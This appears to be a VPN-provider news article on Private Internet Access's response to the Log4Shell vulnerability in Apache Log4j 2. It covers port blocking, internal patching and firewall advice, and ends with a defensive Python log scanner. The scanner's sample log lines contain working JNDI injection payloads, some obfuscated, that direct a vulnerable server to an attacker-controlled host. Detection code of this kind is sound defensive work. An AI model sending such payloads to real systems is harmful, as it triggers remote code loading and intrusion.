On December 9, 2021, a zero-day vulnerability was disclosed in Log4j 2, one of Apache's Java logging frameworks; the vulnerability has been named “Log4Shell”. Cybersecurity experts are correctly calling this a massive, critical-level threat, and even the “single biggest, most critical vulnerability of the last decade.”
Since the threat was disclosed, many VPN companies have been working around the clock to mitigate the damage this exploit could do. Private Internet Access (PIA) is one of them, and it has rolled out a change that helps protect its VPN users from the Log4j 2 vulnerability.
To that end, PIA has issued an update to its VPN infrastructure that now protects all PIA users against most Log4Shell exploits while they’re connected to the VPN.
PIA blocked traffic to the Lightweight Directory Access Protocol (LDAP)
The Log4Shell exploit has been found to rely primarily on outbound connections to certain ports of the LDAP network protocol. Since LDAP traffic can simply be blocked from passing through the VPN, PIA decided that this is not only a practical way to counter the main Log4Shell exploit, but also its duty as a network-based security service.
With LDAP traffic blocked, an attacker can no longer force the user’s device to connect to a suspicious LDAP server and load the malicious code used in the exploit. To achieve this, PIA deployed firewall rules on all of its VPN servers that block certain LDAP ports known to be used in the attacks.
As a result, most Log4Shell exploits are blocked at the network level, ensuring that no malicious code can be sent via these attack vectors.
However, PIA adds that this is not a foolproof, long-term solution: for complete Log4Shell protection, you should focus on upgrading any Java application you currently use on your device. The full list of vulnerable applications is available from this page.
PIA is also taking extra security measures to guarantee internal safety
In addition, the PIA team has also taken extra security measures to make sure its internal systems stay rock solid. Specifically, it has:
- Updated all affected infrastructure to their latest OS versions and applied all security patches.
- Updated all affected internal tools to their latest versions, including fixes for the Log4j vulnerability.
- Audited and patched all affected Docker images, including fixes for the Log4j vulnerability.
- Patched all server fleets against the Log4j vulnerability, including rolling out the LDAP fix that blocks the ports most commonly used by the LDAP protocol.
A word about Log4j 2 & Log4Shell
This is somewhat technical, but given the wide reach this exploit can potentially have, we think it’s worth knowing.
Apache Log4j 2 is a Java logging package that creates and saves log records, for example the error report an application sends to a developer to help them debug a misbehaving application. This is a normal function of Java logging code, and by itself it carries no privacy risk.
However, the Log4Shell vulnerability allows an attacker to get a specially crafted entry written into a log on your device; when Log4j processes that entry, it connects to a server of the attacker’s choosing to fetch additional content. In this way the attacker can retrieve logging data from your server, upload malware onto that server, and execute their malware locally on your device.
The problem is that Log4j 2 is embedded throughout the web’s infrastructure, posing potential risks for virtually all internet-connected services.
In fact, the exploit has already been used successfully against Minecraft, where simply sending a chat message allowed the attacker to gain access to Minecraft’s servers. While this vulnerability has since been patched, there is no way to tell what software has already been compromised and what software still remains vulnerable.
Moreover, Log4Shell attacks don’t require the victim to click any link or take any action; they can be carried out quickly and easily, and virtually every type of malware can be loaded onto a user’s system.
But, as noted above, simply connecting to PIA’s VPN will now help protect against this vulnerability.
In conclusion, we will add that you should always keep your systems and apps up to date so that the latest patches are applied at all times. While you wait for the rest of the Internet to do the same, you can always connect to the internet through PIA’s or some other VPN.
Additionally, you can update your router and/or firewall settings to block traffic to ports associated with Log4Shell, such as RMI (1099) and LDAP (389, 636, 1389, 3268, and 3269). These are already blocked by the PIA app, but for extra security you can block them on your own firewall as well.
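The crafted log entry described above and the port block recommended here can be checked together from the defender’s side. The following Python scanner is an added example, not PIA’s code: it un-nests the Log4j 2 lookup obfuscation that hides the `${jndi:` marker in a log line, extracts the callback scheme, host and port, and reports whether that port falls inside the blocked list (the default-port table and the sample log lines are constructed assumptions).

```python
import re
from urllib.parse import urlparse

# Ports the article names as blocked by PIA and recommended for local firewalls.
BLOCKED_PORTS = {1099, 389, 636, 1389, 3268, 3269}
# Default ports for the JNDI schemes a lookup may name (assumption: only these four).
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Inner Log4j 2 lookups used to disguise "jndi", e.g. ${${lower:J}ndi:...} or ${${::-j}ndi:...};
# each is collapsed to the value Log4j itself would resolve it to.
_INNER = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*?:-([^${}]*)\}")
# A resolved JNDI lookup: scheme and host[:port], read up to the first '/', space or '}'.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)", re.IGNORECASE)

def _resolve_inner(m):
    if m.group(1):                          # ${lower:X} / ${upper:X}
        return getattr(m.group(2), m.group(1))()
    return m.group(3)                       # ${any:key:-default} -> default

def normalize(text: str, max_rounds: int = 10) -> str:
    """Peel nested lookups innermost-first until the string stops changing."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve_inner, text)
        if resolved == text:
            break
        text = resolved
    return text

def find_jndi_lookups(line: str) -> list:
    """Return (scheme, host, port, covered) for each JNDI lookup in one log line.
    `covered` is True when the callback port is in BLOCKED_PORTS, i.e. the network-level
    block would stop it; False marks a lookup that only patching the application stops."""
    hits = []
    for m in _JNDI.finditer(normalize(line)):
        scheme = m.group(1).lower()
        url = urlparse(f"{scheme}://{m.group(2)}")
        try:
            port = url.port or DEFAULT_PORTS.get(scheme)
        except ValueError:                  # non-numeric port in the URL
            port = None
        hits.append((scheme, url.hostname, port, port in BLOCKED_PORTS))
    return hits

# Constructed sample web-server log lines (TEST-NET addresses, not real hosts).
LOG_LINES = [
    '10.0.0.5 "GET /login HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 ua="${${lower:J}ndi:${lower:L}dap://203.0.113.7/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 ua="${${::-j}ndi:rmi://203.0.113.7:1099/a}"',
    '10.0.0.9 "GET / HTTP/1.1" 200 ua="${jndi:ldap://203.0.113.7:8080/a}"',
]
```

Running `find_jndi_lookups` over `LOG_LINES` flags lines 2 to 5; the last one shows why the article calls the port block a stopgap, since its callback port is outside the blocked list and only an upgraded Log4j neutralises it.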
Finally, PIA notes that no PIA user information or data has been compromised, since its engineers reacted promptly, which is what we would expect from such a (great) VPN service.